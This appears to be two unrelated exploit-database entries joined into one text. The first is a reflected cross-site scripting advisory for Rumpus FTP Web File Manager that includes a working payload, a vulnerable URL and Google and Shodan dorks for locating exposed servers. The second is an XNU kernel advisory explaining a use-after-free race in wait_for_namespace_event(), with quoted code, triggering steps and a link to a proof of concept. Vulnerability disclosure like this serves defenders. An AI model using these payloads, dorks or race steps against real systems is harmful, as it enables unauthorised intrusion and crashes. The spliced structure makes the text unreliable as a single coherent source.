# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting # Google Dork: site:*.*.com "Web File Manager" inurl:?login= # Shodan Dork: Server: Rumpus # Date: 2019-12-14 # Exploit Author: Harshit Shukla, Sudeepto Roy # Vendor Homepage: https://www.maxum.com/ # Tested On: Windows & Mac # Version: 8.2.9.1 # CVE: CVE-2019-19368 Description: A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager. PoC: Payload: ?!'><sVg/OnLoAD=alert`1`// Vulnerable URL: http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`// Solution: Update to the latest version released by vendor.

The XNU function wait_for_namespace_event() in bsd/vfs/vfs_syscalls.c releases a file descriptor for use by userspace but may then subsequently destroy that file descriptor using fp_free(), which unconditionally frees the fileproc and fileglob. This opens up a race window during which the process could manipulate those objects while they're being freed. Exploitation requires root privileges. The function wait_for_namespace_event() is reachable from fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT); it is used to listen for filesystem events for generating a snapshot. Here is the vulnerable path in the code: static int wait_for_namespace_event(namespace_handler_data *nhd, nspace_type_t nspace_type) { ... error = falloc(p, &fp, &indx, ctx); if (error) goto cleanup; fp_alloc_successful = true; ... proc_fdlock(p); procfdtbl_releasefd(p, indx, NULL); fp_drop(p, indx, fp, 1); proc_fdunlock(p); ... error = copyout(&nspace_items[i].token, nhd->token, sizeof(uint32_t)); if (error) goto cleanup; ... cleanup: if (error) { if (fp_alloc_successful) fp_free(p, indx, fp); ... } First the file descriptor (indx) and fileproc (fp) are allocated using falloc(). At this point the file descriptor is reserved, and hence unavailable to userspace. Next, procfdtbl_releasefd() is called to release the file descriptor for use by userspace. After the subsequent proc_fdunlock(), another thread in the process could access that file descriptor via another syscall, even while wait_for_namespace_event() is still running. This is problematic because in the error path wait_for_namespace_event() (reachable if copyout() fails) expects to be able to free the file descriptor with fp_free(). fp_free() is a very special-purpose function: it will clear the file descriptor, free the fileglob, and free the fileproc, without taking into consideration whether the fileproc or fileglob are referenced anywhere else. One way to violate these expectations is to make a call to fileport_makeport() in between the proc_fdunlock() and the fp_free(). The ideal case for exploitation would be that a fileport is created which holds a reference to the fileglob before the fp_free() is used to free it, leaving a dangling fileglob pointer in the fileport. In practice it's tricky to end up in that state, but I believe it's possible. The attached POC should trigger a kernel panic. The POC works as follows: First, an HFS DMG is created and mounted because the only paths that reach wait_for_namespace_event() pass through the HFS driver. Next, several racer threads are created which repeatedly try to call fileport_makeport(). Then, fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT) is called to block in wait_for_namespace_event(). The namespace_handler_info_ext structure passed to fsctl() is set up such that the last call to copyout() will fail, which will cause fp_free() to be called. Finally, in order to trigger the bug, another process creates and removes a directory on the mounted HFS DMG, which causes nspace_snapshot_event() to generate an event that wait_for_namespace_event() was waiting for. Usually this will generate a panic with the message "a freed zone element has been modified". Tested on macOS 10.14.6 (18G87). Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47791.zip